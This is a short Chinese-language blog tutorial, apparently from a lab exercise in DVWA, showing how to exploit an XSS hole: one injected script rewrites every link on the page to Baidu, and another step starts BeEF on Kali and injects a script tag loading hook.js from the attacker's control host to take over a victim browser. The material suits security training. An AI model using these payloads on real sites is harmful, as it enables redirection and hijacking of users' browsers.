xss跳转代码_XSS漏洞(恶意链接)

一、环境:DVWA

二、修改网页链接

1、点击下面的网址,访问的是不同的内容

8381ef5fae2de9525b4d71584f98e8d6.png

15a5ed65f8fe1ea4cedb20a3855958bd.png

f7913f8d216e35f1d0643dffacae74e6.png

2、通过xss漏洞,修改这些网址都指向百度

window.onload:当窗口加载时,执行匿名函数

<script>

window.οnlοad=function(){

var link=document.getElementsByTagName("a");

for(j=0;j<link.length;j++){

link[j].href="百度一下,你就知道";

}

}

</script>

3、在漏洞处输入上面代码,提交

581d7da6b78953b6ac9ece453f544abc.png

4、点击这些网址,都是跳转到百度,查看审查元素

228a4983da986f8a1f6c220de1abe57a.png

三、生成恶意链接(kali攻击,win7被攻击)

1、kali启动beff-xss

2、启动apache服务:service apache2 start

3、cd /var/www/html

修改index.html

<script src="http://控制端ip:3000/hook.js"></script>

d9ceedc842ea75557add6f9b4c4f3b48.png

4、在xss漏洞处,输入<script src="http://控制端ip:3000/hook.js"></script>,提交

67a0cc8752043647ce5b6d16c643b1c0.png

5、被控端上线

ae3739c9b5e5e7eb415c7c99d7db604e.png

禁止非法,后果自负

欢迎关注公众号:web安全工具库

79b86809b58696a487d61814086e90a0.png
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值